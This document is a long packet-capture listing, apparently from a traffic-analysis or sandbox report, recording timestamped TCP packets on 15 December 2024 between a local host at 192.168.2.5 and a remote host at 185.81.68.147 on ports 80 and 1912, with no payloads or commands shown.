                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.697065115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.697127104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.697954893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.698087931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.698147058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.699196100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.699254036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.699376106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.700324059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.700448036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.700509071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.701505899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.701630116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.701694965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.702579975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.702694893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.702761889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.703735113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.703908920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.704971075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.705050945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.705059052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.705101013 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.706075907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.706243038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.706309080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.707321882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.707369089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.707439899 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.708447933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.708571911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.709017992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.709669113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.709686995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.709747076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.710742950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.755032063 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.838109970 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.842231989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.842387915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.842485905 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.842803955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.842914104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.842958927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.844017982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.844162941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.845309019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.845356941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.845382929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.845427036 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.846661091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.846736908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.846780062 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.847553968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.847573042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.848639965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.848715067 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.848736048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.848784924 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.849760056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.849900007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.849941969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.851129055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.851352930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.851393938 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.852226019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.852243900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.852314949 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.853266001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.853404999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.854410887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.854451895 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.854516029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.854557991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.855566978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.855683088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.856847048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.856911898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.856976986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.857017040 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.857927084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.858057022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.858572960 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.859019041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.859148979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.860263109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.860321999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.860416889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.860455036 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.861377001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.861603022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.862533092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.862576962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.862637997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.863773108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.863842964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.864073038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.864111900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.864965916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.864979982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.866142035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.866157055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.866189957 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.866218090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.867264032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.867279053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.867330074 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.868447065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.868464947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.868508101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.869529009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.869643927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.870589018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.870717049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.871121883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.871812105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.871856928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.872210026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.872250080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.873127937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.873146057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.874241114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.874284983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.874310017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.874355078 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.875358105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.875427961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.875473022 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.876487970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.876703978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.877743006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.877760887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.877782106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.877820969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.878901958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.878923893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.878998041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.879995108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.880197048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.881244898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.881263018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.881283045 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.881311893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.882339954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.882585049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.883558035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.883577108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.883601904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.883642912 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.884708881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.884727001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.884766102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.885776043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.885957956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.886570930 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.886971951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.887139082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.888195992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.888238907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.888248920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.888278961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.889389038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.889404058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.889473915 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.890516043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.890536070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.891684055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.891702890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.891725063 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.891757965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.892826080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.892848015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.892920971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.893894911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.893989086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.894572973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.895122051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.895212889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.896225929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.896295071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.896330118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.896370888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.897495031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.897509098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.898574114 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.898590088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.899349928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.899867058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.899884939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.899934053 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.899960041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.900953054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.900966883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.901026011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.902098894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.902122021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.902179956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.903367996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.958147049 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.959757090 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.034872055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.035016060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.035104990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.035505056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.035680056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.036753893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.036775112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.036794901 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.036828041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.037811041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.037986040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.038204908 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.039028883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.039192915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.039300919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.040211916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.040230989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.040285110 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.041232109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.041395903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.041434050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.042459011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.042628050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.043081999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.043669939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.043823004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.043874979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.044807911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.044950962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.045006037 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.045903921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.046061039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.046114922 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.047152996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.047173023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.047229052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.048238993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.048377991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.048471928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.049469948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.049489975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.049640894 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.050600052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.050797939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.051606894 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.051791906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.051953077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.052012920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.052908897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.053057909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.053124905 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.054096937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.054254055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.054344893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.055218935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.055377007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.055677891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.056361914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.056524038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.056611061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.057585955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.057605028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.057662010 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.058804989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.058825016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.058891058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.059818029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.059998035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.060137033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.061100960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.061116934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.061189890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.061759949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.061899900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.061961889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.062956095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.063218117 CET8049708185.81.68.147192.168.2.5
